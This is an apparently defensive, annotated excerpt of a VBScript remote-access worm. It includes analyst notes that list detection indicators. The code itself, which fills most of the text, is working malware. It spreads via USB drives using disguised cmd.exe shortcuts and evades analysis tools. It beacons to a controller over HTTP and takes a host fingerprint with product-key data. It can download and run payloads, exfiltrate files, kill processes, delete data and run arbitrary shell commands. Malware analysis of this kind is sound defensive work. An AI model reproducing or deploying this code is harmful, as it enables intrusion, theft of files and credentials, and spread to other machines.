  312. THOIGIAN_LAMTUOI = eval(TSO_CHO_LENHTHUCTHI)
  313. end select
  314. wscript.sleep THOIGIAN_LAMTUOI
  315. wend
  ' ANALYST NOTE: removable-media propagation, run on every pass of the main loop. For each ready removable
  ' drive (drivetype = 1) with free space it copies the script into the drive root. When the two shortcut
  ' switches are enabled it additionally creates, for each root file and folder, a .lnk whose target is
  ' cmd.exe and whose arguments start the script copy and then open the original item, using the original
  ' item's icon; originals are hidden unless TF_HIEN_TMUCSFILES_USB is true.
  ' In this sample both shortcut switches are false, so both inner loops exit on their first line and only
  ' the copy to the drive root happens (the hidden+system attributes on that copy are set inside the first
  ' loop, after its exit check, and are therefore not applied by this routine).
  ' Defensive pointers: .vbs files appearing in the root of removable media, and .lnk files whose target is
  ' cmd.exe with "/c start ..." arguments, are the artefacts to hunt for; restricting script-host execution
  ' from removable media addresses this vector.
  316. sub CAIDATVAOUSB_SUB
  317. on error resume next
  318. dim LOITATER,TEN_FILE_IN_USB,TEN_THUMUC_IN_USB,ICON_LINKFILE_IN_USB,ICON_THUMUC_IN_USB
  319. for each CAC_USB in OBJ_HTHONG_TTIN.drives
  320. if CAC_USB.isready = true then
  321. if CAC_USB.freespace > 0 then
  322. if CAC_USB.drivetype = 1 then
  323. if not OBJ_HTHONG_TTIN.fileexists(CAC_USB.path & "\" & DT_USB_SSD_FN) then
  324. OBJ_HTHONG_TTIN.copyfile WS_FCODENAME, CAC_USB.path & "\" & DT_USB_SSD_FN,true
  325. end if
  326. for each TAPTIN_DACO_IN_USB in OBJ_HTHONG_TTIN.getfolder(CAC_USB.path & "\").Files
  327. if not BATTAT_LAYLAN_LINKTAPTIN_USB then exit for
  328. if instr(TAPTIN_DACO_IN_USB.name,".") then
  329. if lcase(split(TAPTIN_DACO_IN_USB.name, ".") (ubound(split(TAPTIN_DACO_IN_USB.name, ".")))) <> "lnk" then
  330. OBJ_HTHONG_TTIN.getfile(CAC_USB.path & "\" & DT_USB_SSD_FN).attributes=2+4
  331. if ucase(TAPTIN_DACO_IN_USB.name) <> ucase(DT_USB_SSD_FN) then
  332. TEN_FILE_IN_USB = split(TAPTIN_DACO_IN_USB.name,".")
  333. set LOITATER = OBJ_WSSHELL.createshortcut(CAC_USB.path & "\" & TEN_FILE_IN_USB(0) & ".lnk")
  ' Window style 7 = minimized, so the cmd.exe window is not shown in the foreground.
  334. LOITATER.windowstyle = 7
  335. LOITATER.targetpath = "cmd.exe"
  336. LOITATER.workingdirectory = ""
  337. LOITATER.arguments = "/c start " & replace(DT_USB_SSD_FN," ", chrw(34) & " " & chrw(34)) & "&start " & replace(TAPTIN_DACO_IN_USB.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  ' Icon is looked up from the file type's DefaultIcon registration so the shortcut resembles the original.
  338. ICON_LINKFILE_IN_USB = OBJ_WSSHELL.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\" & OBJ_WSSHELL.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\." & split(TAPTIN_DACO_IN_USB.name, ".")(ubound(split(TAPTIN_DACO_IN_USB.name, ".")))& "\") & "\defaulticon\")
  339. if instr(ICON_LINKFILE_IN_USB,",") = 0 then
  340. LOITATER.iconlocation = TAPTIN_DACO_IN_USB.path
  341. else
  342. LOITATER.iconlocation = ICON_LINKFILE_IN_USB
  343. end if
  344. LOITATER.save()
  345. end if
  346. if TF_HIEN_TMUCSFILES_USB then
  347. TAPTIN_DACO_IN_USB.attributes=0
  348. else
  349. TAPTIN_DACO_IN_USB.attributes=2
  350. end if
  351. end if
  352. end if
  353. next
  354. for each THUMUC_DACO_IN_USB in OBJ_HTHONG_TTIN.getfolder(CAC_USB.path & "\" ).subfolders
  355. if not BATTAT_LAYLAN_LINKTHUMUC_USB then exit for
  356. TEN_THUMUC_IN_USB = THUMUC_DACO_IN_USB.name
  357. set LOITATER = OBJ_WSSHELL.createshortcut(CAC_USB.path & "\" & TEN_THUMUC_IN_USB & ".lnk")
  358. LOITATER.windowstyle = 7
  359. LOITATER.targetpath = "cmd.exe"
  360. LOITATER.workingdirectory = ""
  361. LOITATER.arguments = "/c start " & replace(DT_USB_SSD_FN," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(THUMUC_DACO_IN_USB.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  362. ICON_THUMUC_IN_USB = OBJ_WSSHELL.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\folder\defaulticon\")
  363. if instr(ICON_THUMUC_IN_USB,",") = 0 then
  364. LOITATER.iconlocation = THUMUC_DACO_IN_USB.path
  365. else
  366. LOITATER.iconlocation = ICON_THUMUC_IN_USB
  367. end if
  368. LOITATER.save()
  369. if TF_HIEN_TMUCSFILES_USB then
  370. THUMUC_DACO_IN_USB.attributes=0
  371. else
  372. THUMUC_DACO_IN_USB.attributes=2
  373. end if
  374. next
  375. end if
  376. end if
  377. end if
  378. next
  ' Persistence is re-asserted on every pass: Run values and Startup copies deleted while the process is
  ' alive are written again here.
  379. CAIDATVAOMAY_SUB
  380. err.clear
  381. end sub
  ' ANALYST NOTE: common exit path for the environment checks - waits 11 ms, then terminates the script host.
  ' Nothing is cleaned up here, so persistence artefacts already written remain on disk and in the registry.
  382. sub THOAT_XAC
  383. wscript.sleep 11
  384. wscript.quit
  385. end sub
  ' ANALYST NOTE: first analysis-tool check (enabled in this sample via BATTAT_ANTI1) and run on every pass
  ' of the main loop. Issues thirteen WMI win32_process queries by process name and exits the script when
  ' any of them returns exactly one process (Count=1). Consequences for responders: the script stops
  ' beaconing while one of these tools is running but persistence stays in place, so it starts again at
  ' next logon; the repeated per-name WMI queries from wscript.exe are a behavioural indicator.
  386. function ROUTER_MOT()
  387. on error resume next
  388. set RTM_1 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'ProcessHacker.exe'")
  389. set RTM_2 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'procexp.exe'")
  390. set RTM_3 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Procmon.exe'")
  391. set RTM_4_1 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'pchunter32.exe'")
  392. set RTM_4_2 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'pchunter64.exe'")
  393. set RTM_5 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'SysTracer.exe'")
  394. set RTM_6 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'spybhoremover.exe'")
  395. set RTM_7 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'defenderdaemon.exe'")
  396. set RTM_8 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Wireshark.exe'")
  397. set RTM_9 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Vbs Lookup.exe'")
  398. set RTM_10 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Vbs Anti.exe'")
  399. set RTM_11 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'roguekiller.exe'")
  400. set RTM_12 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'fakenet.exe'")
  401. if RTM_1.Count=1 then
  402. THOAT_XAC
  403. elseif RTM_2.Count=1 then
  404. THOAT_XAC
  405. elseif RTM_3.Count=1 then
  406. THOAT_XAC
  407. elseif RTM_4_1.Count=1 then
  408. THOAT_XAC
  409. elseif RTM_4_2.Count=1 then
  410. THOAT_XAC
  411. elseif RTM_5.Count=1 then
  412. THOAT_XAC
  413. elseif RTM_6.Count=1 then
  414. THOAT_XAC
  415. elseif RTM_7.Count=1 then
  416. THOAT_XAC
  417. elseif RTM_8.Count=1 then
  418. THOAT_XAC
  419. elseif RTM_9.Count=1 then
  420. THOAT_XAC
  421. elseif RTM_10.Count=1 then
  422. THOAT_XAC
  423. elseif RTM_11.Count=1 then
  424. THOAT_XAC
  425. elseif RTM_12.Count=1 then
  426. THOAT_XAC
  427. end if
  428. end function
  ' ANALYST NOTE: second analysis-tool check (disabled in this sample; BATTAT_ANTI2 is false). Same pattern
  ' as ROUTER_MOT with a different name list that includes Task Manager and several network-monitoring
  ' utilities: one WMI win32_process query per name, exit when a query returns exactly one process.
  429. function ROUTER_HAI()
  430. on error resume next
  431. set RTM_1 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'taskmgr.exe'")
  432. set RTM_2 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'apatedns.exe'")
  433. set RTM_3 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'fab.exe'")
  434. set RTM_4 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'cports.exe'")
  435. set RTM_5 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'smsniff.exe'")
  436. set RTM_6 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'HijackThis.exe'")
  437. set RTM_7 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'netagent.exe'")
  438. set RTM_8 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'tiger-Firewall.exe'")
  439. set RTM_9 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'TcpView.exe'")
  440. set RTM_10 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Active Ports.exe'")
  441. if RTM_1.Count=1 then
  442. THOAT_XAC
  443. elseif RTM_2.Count=1 then
  444. THOAT_XAC
  445. elseif RTM_3.Count=1 then
  446. THOAT_XAC
  447. elseif RTM_4.Count=1 then
  448. THOAT_XAC
  449. elseif RTM_5.Count=1 then
  450. THOAT_XAC
  451. elseif RTM_6.Count=1 then
  452. THOAT_XAC
  453. elseif RTM_7.Count=1 then
  454. THOAT_XAC
  455. elseif RTM_8.Count=1 then
  456. THOAT_XAC
  457. elseif RTM_9.Count=1 then
  458. THOAT_XAC
  459. elseif RTM_10.Count=1 then
  460. THOAT_XAC
  461. end if
  462. end function
  ' ANALYST NOTE: the single transport routine for beaconing and for returning command output.
  ' Sends a synchronous HTTP POST to http://<host>:<port>/<first argument> with the second argument as the
  ' body and returns the response text. The host fingerprint built by TAPHOPINFOR_HAM is placed in a request
  ' header whose name is written as "user-agent:" (with the trailing colon).
  ' Network signatures that follow directly from these lines: cleartext POSTs to port 7000 whose path is a
  ' bare keyword such as is-ready, and a user-agent header value containing "<|>"-separated host details.
  463. function THANKGOD_YOUAREHERE(LENHTHUCTHI,TSO_CHO_LENHTHUCTHI)
  464. THANKGOD_YOUAREHERE = TSO_CHO_LENHTHUCTHI
  465. MANGCUATUI.open "post","http://" & DIACHI_KETNOI & ":" & CONG_KETNOI &"/" & LENHTHUCTHI,false
  466. MANGCUATUI.setrequestheader "user-agent:",TAPHOPINFOR_HAM
  467. MANGCUATUI.send TSO_CHO_LENHTHUCTHI
  468. THANKGOD_YOUAREHERE = MANGCUATUI.responsetext
  469. end function
  ' ANALYST NOTE: handler for "site-send" - download-and-run. Both the URL and the file name come from the
  ' controller's response. The body of an HTTP 200 response is written as binary (ADODB.Stream type 1) to
  ' the TEMP working subfolder if it exists, otherwise to the user's TEMP folder, and the saved file is then
  ' started via WScript.Shell.Run. Any second-stage payload is therefore expected under the user's TEMP
  ' path; wscript.exe spawning a child process from there is a detection opportunity.
  470. sub LAY_FILETHEO_URL_VA_THUCTHI_SUB(URL_CHUA_FILE,TEN_FILE_GUI_URL)
  471. CHUOI_LIENKET = URL_CHUA_FILE
  472. if not OBJ_HTHONG_TTIN.folderexists(STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP) then
  473. CHUOI_DATFILE_VAODAU = STR_DUONGDAN_USER_TEMP & "\" & TEN_FILE_GUI_URL
  474. else
  475. CHUOI_DATFILE_VAODAU = STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP & "\" & TEN_FILE_GUI_URL
  476. end if
  477. set OBJ_LAY_FILE_URL_VA_CHAY = createobject("msxml2.xmlhttp")
  478. OBJ_LAY_FILE_URL_VA_CHAY.open "get", CHUOI_LIENKET, false
  479. OBJ_LAY_FILE_URL_VA_CHAY.send
  480. set OBJ_HETHONG_TAPTIN_FILE_URL_RUN = createobject("scripting.filesystemobject")
  ' An existing file of the same name is removed first, so a stale copy from an earlier download is
  ' overwritten rather than kept.
  481. if OBJ_HETHONG_TAPTIN_FILE_URL_RUN.fileexists(CHUOI_DATFILE_VAODAU) then
  482. OBJ_HETHONG_TAPTIN_FILE_URL_RUN.deletefile(CHUOI_DATFILE_VAODAU),true
  483. end if
  484. if OBJ_LAY_FILE_URL_VA_CHAY.status = 200 then
  485. dim ADO_TAI_URL_CHAY
  486. set ADO_TAI_URL_CHAY = createobject("adodb.stream")
  487. with ADO_TAI_URL_CHAY
  488. .type = 1
  489. .open
  490. .write OBJ_LAY_FILE_URL_VA_CHAY.responsebody
  491. .savetofile CHUOI_DATFILE_VAODAU
  492. .close
  493. end with
  494. set ADO_TAI_URL_CHAY = nothing
  495. end if
  496. if OBJ_HETHONG_TAPTIN_FILE_URL_RUN.fileexists(CHUOI_DATFILE_VAODAU) then
  497. OBJ_WSSHELL.run OBJ_HETHONG_TAPTIN_FILE_URL_RUN.getfile(CHUOI_DATFILE_VAODAU).shortpath
  498. end if
  499. end sub
  ' ANALYST NOTE: handler for "send" - the controller pushes a file and has it run. The script POSTs to
  ' /is-sending<|><path> on the controller, saves the binary response body under the destination folder
  ' (controller-supplied, or the TEMP working folder when empty) using the part of the path after the last
  ' backslash as the file name, then starts the saved file.
  ' The request path contains the literal "<|>" separator followed by a file path, which is distinctive in
  ' proxy logs.
  500. sub DUAFILELEN_VIC_ROICHAY_SUB(URL_CHUA_FILE,THU_MUC_VIC_NHAN)
  501. if THU_MUC_VIC_NHAN = "" then
  502. if not OBJ_HTHONG_TTIN.folderexists(STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP) then
  503. THU_MUC_VIC_NHAN = STR_DUONGDAN_USER_TEMP & "\"
  504. else
  505. THU_MUC_VIC_NHAN = STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP & "\"
  506. end if
  507. end if
  508. CHUOI_DATFILE_VAODAU = THU_MUC_VIC_NHAN & mid(URL_CHUA_FILE, instrrev(URL_CHUA_FILE,"\") + 1)
  509. set OBJ_DUAFILELEN_VIC_VA_CHAY = createobject("msxml2.xmlhttp")
  510. OBJ_DUAFILELEN_VIC_VA_CHAY.open "post","http://" & DIACHI_KETNOI & ":" & CONG_KETNOI &"/" & "is-sending" & MK & URL_CHUA_FILE, false
  511. OBJ_DUAFILELEN_VIC_VA_CHAY.send ""
  512. set OBJ_HETHONG_TAPTIN_DUAFILELEN_VA_RUN = createobject("scripting.filesystemobject")
  513. if OBJ_HETHONG_TAPTIN_DUAFILELEN_VA_RUN.fileexists(CHUOI_DATFILE_VAODAU) then
  514. OBJ_HETHONG_TAPTIN_DUAFILELEN_VA_RUN.deletefile(CHUOI_DATFILE_VAODAU),true
  515. end if
  516. if OBJ_DUAFILELEN_VIC_VA_CHAY.status = 200 then
  517. dim ADO_TAI_DISKFILE_LEN_VA_CHAY
  518. set ADO_TAI_DISKFILE_LEN_VA_CHAY = createobject("adodb.stream")
  519. with ADO_TAI_DISKFILE_LEN_VA_CHAY
  520. .type = 1
  521. .open
  522. .write OBJ_DUAFILELEN_VIC_VA_CHAY.responsebody
  523. .savetofile CHUOI_DATFILE_VAODAU
  524. .close
  525. end with
  526. set ADO_TAI_DISKFILE_LEN_VA_CHAY = nothing
  527. end if
  528. if OBJ_HETHONG_TAPTIN_DUAFILELEN_VA_RUN.fileexists(CHUOI_DATFILE_VAODAU) then
  529. OBJ_WSSHELL.run OBJ_HETHONG_TAPTIN_DUAFILELEN_VA_RUN.getfile(CHUOI_DATFILE_VAODAU).shortpath
  530. end if
  531. end sub
  ' ANALYST NOTE: handler for "recv" - file exfiltration. Reads the local file named by the controller as
  ' binary (ADODB.Stream type 1) and POSTs the bytes to /is-recving<|><local path> on the controller.
  ' The full local path of every file taken appears in the request path, so proxy or packet-capture data
  ' can be used to scope what left the host. The local MANGCUATUI declared here shadows the script-level
  ' HTTP object, and no host-fingerprint header is set on this request.
  532. function LAY_FILE_VENHA_FILEMAN_HAM(URL_CHUA_FILE)
  533. dim MANGCUATUI,ADO_LAY_FILE_VENHA,BO_DEM_BUF_LAY_FILE_VE_NHA
  534. set ADO_LAY_FILE_VENHA = createobject("adodb.stream")
  535. with ADO_LAY_FILE_VENHA
  536. .type = 1
  537. .open
  538. .loadfromfile URL_CHUA_FILE
  539. BO_DEM_BUF_LAY_FILE_VE_NHA = .read
  540. .close
  541. end with
  542. set ADO_LAY_FILE_VENHA = nothing
  543. set MANGCUATUI = createobject("msxml2.xmlhttp")
  544. MANGCUATUI.open "post","http://" & DIACHI_KETNOI & ":" & CONG_KETNOI &"/" & "is-recving" & MK & URL_CHUA_FILE, false
  545. MANGCUATUI.send BO_DEM_BUF_LAY_FILE_VE_NHA
  546. end function
  ' ANALYST NOTE: reconnaissance helper for "enum-driver". Returns one "<path>|<drive type>" entry per
  ' ready drive, each terminated by the "<|>" separator.
  547. function LAYCACODIA_HAM()
  548. for each EXTDEVS in OBJ_HTHONG_TTIN.drives
  549. if EXTDEVS.isready = true then LAYCACODIA_HAM = LAYCACODIA_HAM & EXTDEVS.path & "|" & EXTDEVS.drivetype & MK
  550. next
  551. end function
  ' ANALYST NOTE: reconnaissance helper for "enum-faf" (directory listing). Returns the requested path,
  ' then one record per subfolder ("<name>||d|<attributes>") and per file ("<name>|<size>|f|<attributes>"),
  ' each terminated by "<|>". Knowing this record layout helps when decoding captured POST bodies sent to
  ' /is-enum-faf.
  552. function CACTHUMUC_HAM(CACTHUMUC_GET_INF)
  553. CACTHUMUC_HAM = CACTHUMUC_GET_INF & MK
  554. for each THUMUC_DACO_IN_MAY in OBJ_HTHONG_TTIN.getfolder(CACTHUMUC_GET_INF).subfolders
  555. CACTHUMUC_HAM = CACTHUMUC_HAM & THUMUC_DACO_IN_MAY.name & "|" & "" & "|" & "d" & "|" & THUMUC_DACO_IN_MAY.attributes & MK
  556. next
  557. for each TTIN_DACO_IN_MACHINE in OBJ_HTHONG_TTIN.getfolder(CACTHUMUC_GET_INF).files
  558. CACTHUMUC_HAM = CACTHUMUC_HAM & TTIN_DACO_IN_MACHINE.name & "|" & TTIN_DACO_IN_MACHINE.size & "|" & "f" & "|" & TTIN_DACO_IN_MACHINE.attributes & MK
  559. next
  560. end function
  ' ANALYST NOTE: reconnaissance helper for "enum-process". Queries WMI win32_process (flags 48 =
  ' return-immediately + forward-only) and returns "<name>|<pid>|<executable path>" per process, each
  ' terminated by "<|>". The result is POSTed to /is-enum-process by the main loop.
  561. function CACTIENTRINH_HAM()
  562. on error resume next
  563. set CACDTTHEOCOT_PROC = DT_WMG_DOT.execquery("select * from win32_process",,48)
  564. dim DT_PROC
  565. for each DT_PROC in CACDTTHEOCOT_PROC
  566. CACTIENTRINH_HAM = CACTIENTRINH_HAM & DT_PROC.name & "|"
  567. CACTIENTRINH_HAM = CACTIENTRINH_HAM & DT_PROC.processid & "|"
  568. CACTIENTRINH_HAM = CACTIENTRINH_HAM & DT_PROC.executablepath & MK
  569. next
  570. end function
  ' ANALYST NOTE: handler for "exit-process". Runs "taskkill /F /T /PID <value>" in a minimized window
  ' (style 7) and waits for it to finish; the value comes straight from the controller's response.
  ' Process telemetry showing wscript.exe spawning taskkill.exe with /F /T /PID is a detection opportunity,
  ' and the command can be used against security tooling on the host.
  571. sub TAT_TIENTRINH_SUB(MASO_TIENTRINH)
  572. on error resume next
  573. OBJ_WSSHELL.run "taskkill /F /T /PID " & MASO_TIENTRINH,7,true
  574. end sub
  ' ANALYST NOTE: handler for "delete". Tries to delete the controller-supplied path both as a file and as
  ' a folder, with the force flag set (read-only items included); errors are suppressed, so whichever call
  ' does not apply fails silently. Deletions go through FileSystemObject, not through the shell.
  575. sub XOA_TAPTIN_VA_THUMUC_SUB(DUONGDAN_FILE_OR_THUMUC)
  576. on error resume next
  577. OBJ_HTHONG_TTIN.deletefile DUONGDAN_FILE_OR_THUMUC,true
  578. OBJ_HTHONG_TTIN.deletefolder DUONGDAN_FILE_OR_THUMUC,true
  579. end sub
  ' ANALYST NOTE: handler for "cmd-shell" - remote command execution. Runs the controller-supplied text
  ' through "%comspec% /c" using WScript.Shell.Exec and returns standard output, or standard error when
  ' standard output is already at end of stream, or an empty string. The main loop POSTs the result to
  ' /is-cmd-shell. wscript.exe with cmd.exe /c children is the process-tree pattern to alert on.
  580. function DIEUKHIEN_CMD_HAM(LENHTHUCTHI)
  581. dim MANGCUATUI,OBJ_WSSHELL_EXECU,DOCDATA_SHELLOUT
  582. set OBJ_WSSHELL_EXECU = OBJ_WSSHELL.exec("%comspec% /c " & LENHTHUCTHI)
  583. if not OBJ_WSSHELL_EXECU.stdout.atendofstream then
  584. DOCDATA_SHELLOUT = OBJ_WSSHELL_EXECU.stdout.readall
  585. elseif not OBJ_WSSHELL_EXECU.stderr.atendofstream then
  586. DOCDATA_SHELLOUT = OBJ_WSSHELL_EXECU.stderr.readall
  587. else
  588. DOCDATA_SHELLOUT = ""
  589. end if
  590. DIEUKHIEN_CMD_HAM = DOCDATA_SHELLOUT
  591. end function
  ' ANALYST NOTE: builds the host fingerprint that THANKGOD_YOUAREHERE sends in its "user-agent:" header on
  ' every request. Fields, separated by "<|>": victim ID (LAY_TENVIC_THEOMAHW_HAM), computer name, user
  ' name, OS caption with x86/x64 and service pack, a "/"-joined block (Admin or Non-Admin, On or Off from
  ' UAC_DABAT_HAM, .NET, CPU, RAM, GPU, and a value derived from DigitalProductId via CVERT_PCKEY_HAM),
  ' the antivirus name (LAY_TENTRINH_AV_HAM) and the infection-origin marker. Several of these helpers are
  ' defined outside this excerpt.
  ' Privacy/impact note: the registry value read here holds Windows product-key material, so licence data
  ' should be treated as disclosed on an affected host.
  ' NOTE(review): VEU is not declared in this excerpt; unless it is declared at script level elsewhere, the
  ' "if VEU = """ cache test is always true and the fingerprint is rebuilt on each call - confirm.
  592. function TAPHOPINFOR_HAM
  593. on error resume next
  594. dim DIGI_PROID
  595. DIGI_PROID = OBJ_WSSHELL.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DigitalProductId")
  596. if VEU = "" then
  597. VEU = LAY_TENVIC_THEOMAHW_HAM & MK
  598. VEU = VEU & OBJ_WSSHELL.expandenvironmentstrings("%computername%") & MK
  599. VEU = VEU & OBJ_WSSHELL.expandenvironmentstrings("%username%") & MK
  600. set HDH = DT_WMG_IMP.execquery("select * from win32_operatingsystem")
  601. for each TEN_HDH in HDH
  ' Architecture is inferred from whether the %PROGRAMFILES(x86)% folder exists.
  602. if not OBJ_HTHONG_TTIN.folderexists(OBJ_WSSHELL.expandenvironmentstrings("%PROGRAMFILES(x86)%")) then
  603. VEU = VEU & TEN_HDH.caption & " x86 SP" & TEN_HDH.ServicePackMajorVersion & MK
  604. else
  605. VEU = VEU & TEN_HDH.caption & " x64 SP" & TEN_HDH.ServicePackMajorVersion & MK
  606. end if
  607. exit for
  608. next
  609. if CHECKISADMIN_HAM = false then
  610. if UAC_DABAT_HAM = true then
  611. VEU = VEU & "Non-Admin/On/" & DNET_HAM & "/" & TENCPU_HAM & "/RAM " & MYRAM_HAM & "/" & TENGPU_HAM & "/" & CVERT_PCKEY_HAM(DIGI_PROID) & MK
  612. else
  613. VEU = VEU & "Non-Admin/Off/" & DNET_HAM & "/" & TENCPU_HAM & "/RAM " & MYRAM_HAM & "/" & TENGPU_HAM & "/" & CVERT_PCKEY_HAM(DIGI_PROID) & MK
  614. end if
  615. else
  616. if UAC_DABAT_HAM = true then
  617. VEU = VEU & "Admin/On/" & DNET_HAM & "/" & TENCPU_HAM & "/RAM " & MYRAM_HAM & "/" & TENGPU_HAM & "/" & CVERT_PCKEY_HAM(DIGI_PROID) & MK
  618. else
  619. VEU = VEU & "Admin/Off/" & DNET_HAM & "/" & TENCPU_HAM & "/RAM " & MYRAM_HAM & "/" & TENGPU_HAM & "/" & CVERT_PCKEY_HAM(DIGI_PROID) & MK
  620. end if
  621. end if
  622. VEU = VEU & LAY_TENTRINH_AV_HAM & MK
  623. VEU = VEU & COHAYKO_TU_USB
  624. TAPHOPINFOR_HAM = VEU
  625. else
  626. TAPHOPINFOR_HAM = VEU
  627. end if
  628. end function
  629. function CHECKISADMIN_HAM()
       ' Returns true when ADMINLOCALGROUP_HAM sets its argument to 1, otherwise false.
       ' LA_ADMIN starts out Empty and the helper only ever assigns 1, so any other
       ' outcome (including an error inside the helper) is reported as false.
       ' Analyst note: the result reflects local group membership as computed by the
       ' helper. Nothing here inspects whether the current process is elevated.
  630. dim LA_ADMIN
  631. call ADMINLOCALGROUP_HAM(LA_ADMIN)
  632. if LA_ADMIN = 1 then
  633. CHECKISADMIN_HAM = true
  634. else
  635. CHECKISADMIN_HAM = false
  636. end if
  637. set LA_ADMIN = nothing
  638. end function
  639. function ADMINLOCALGROUP_HAM(ISADMIN)
       ' Sets ISADMIN to 1 when the current user is listed in the local Administrators
       ' group. ISADMIN is left untouched otherwise and is used as an output argument.
       ' Steps:
       '   1. enumerate local groups through the WinNT:// provider on "." and collect
       '      the names of groups that have a member whose Name equals the current user
       '   2. resolve the Administrators group name by its well-known SID S-1-5-32-544
       '      (lookup by SID, so the result does not depend on the OS display language)
       '   3. case-insensitive substring search of that name in the collected list
       ' Analyst note: step 1 compares bare account names and step 3 is a substring
       ' match, so the answer is approximate. The function itself returns no value.
       ' DT_WMG_DOT is a WMI object created elsewhere in the file.
  640. PCNAME = "."
  641. set OBJ_MANG = CreateObject("WScript.Network")
  642. set COT_CACNHOM = GetObject("WinNT://" & PCNAME & "")
  643. COT_CACNHOM.Filter = Array("group")
  644. for each NHOM in COT_CACNHOM
  645. for each TVIEN in NHOM.Members
  646. if TVIEN.Name = OBJ_MANG.UserName then
  647. CACNHOM = CACNHOM & " , " & NHOM.Name
  648. end if
  649. next
  650. next
  651. for each NHOM_QUANTRI in DT_WMG_DOT.ExecQuery("SELECT * FROM Win32_Group WHERE SID = 'S-1-5-32-544'")
  652. TEN_NHOMQUANTRI = NHOM_QUANTRI.Name
  653. next
  654. if InStr(LCase(CACNHOM), LCase(TEN_NHOMQUANTRI)) > 0 then
  655. ISADMIN = 1
  656. end if
  657. set COT_CACNHOM = nothing
  658. end function
  659. function DNET_HAM
       ' Returns a .NET Framework version string for the host profile.
       ' Reads the "Version" values under the NDP\v2.0.50727 and NDP\v4\Full setup keys,
       ' then checks whether mscorlib.dll exists in the matching %windir% framework folder.
       '   both values present : v4 value if its mscorlib.dll exists, else v2 value if its
       '                         mscorlib.dll exists, else "<v2>+<v4>"
       '   only one present    : that value, but only if its mscorlib.dll exists
       '                         (otherwise the function result stays Empty)
       '   neither present     : the literal "Ask Him_Her :)"
       ' Analyst note: that literal is a fixed string of this sample and can appear in
       ' the .NET slot of the profile built by TAPHOPINFOR_HAM.
       ' A missing registry value raises an error that "on error resume next" swallows,
       ' leaving N2/N4 Empty.
  660. on error resume next
  661. N2 = OBJ_WSSHELL.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727\Version")
  662. N4 = OBJ_WSSHELL.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full\Version")
  663. if (N2 <> "") and (N4 <> "") then
  664. if OBJ_HTHONG_TTIN.fileexists(OBJ_WSSHELL.expandenvironmentstrings("%windir%") & "\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll") then
  665. DNET_HAM = N4
  666. elseif OBJ_HTHONG_TTIN.fileexists(OBJ_WSSHELL.expandenvironmentstrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll") then
  667. DNET_HAM = N2
  668. else
  669. DNET_HAM = N2 & "+" & N4
  670. end if
  671. elseif N2 <> "" then
  672. if OBJ_HTHONG_TTIN.fileexists(OBJ_WSSHELL.expandenvironmentstrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll") then DNET_HAM = N2
  673. elseif N4 <> "" then
  674. if OBJ_HTHONG_TTIN.fileexists(OBJ_WSSHELL.expandenvironmentstrings("%windir%") & "\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll") then DNET_HAM = N4
  675. else
  676. DNET_HAM = "Ask Him_Her :)"
  677. end if
  678. end function
  679. function TENCPU_HAM()
       ' Returns the Name property from WMI class Win32_Processor.
       ' The loop has no "exit for", so with several processor instances the last one wins.
       ' With errors suppressed, a failed query leaves the result Empty.
       ' DT_WMG_IMP is a WMI object created elsewhere in the file.
  680. on error resume next
  681. set COT_BOVIXULY = DT_WMG_IMP.execquery("select * from Win32_Processor")
  682. for each DOI_TUONG_IN_BOVIXULY in COT_BOVIXULY
  683. TENCPU_HAM = DOI_TUONG_IN_BOVIXULY.name
  684. next
  685. end function
  686. function MYRAM_HAM
       ' Returns installed physical memory as text for the host profile.
       ' Takes TotalPhysicalMemory from the first Win32_ComputerSystem instance,
       ' divides it by 1024*1024*1024 and rounds to 3 decimals.
       ' Analyst note: the number is therefore in GiB although the appended suffix is
       ' the literal "MB". Keep that in mind when parsing captured profile strings.
  687. on error resume next
  688. set COT_COMSYSTEM = DT_WMG_IMP.execquery("select * from Win32_ComputerSystem")
  689. SO_GB = 1024*1024*1024
  690. for each DOI_TUONG_IN_COMSYSTEM in COT_COMSYSTEM
  691. MYRAM_HAM = Round(DOI_TUONG_IN_COMSYSTEM.TotalPhysicalMemory/SO_GB,3) & "MB"
  692. exit for
  693. next
  694. end function
  695. function TENGPU_HAM()
       ' Returns the Caption property from WMI class Win32_VideoController.
       ' The loop has no "exit for", so with several adapters the last one wins.
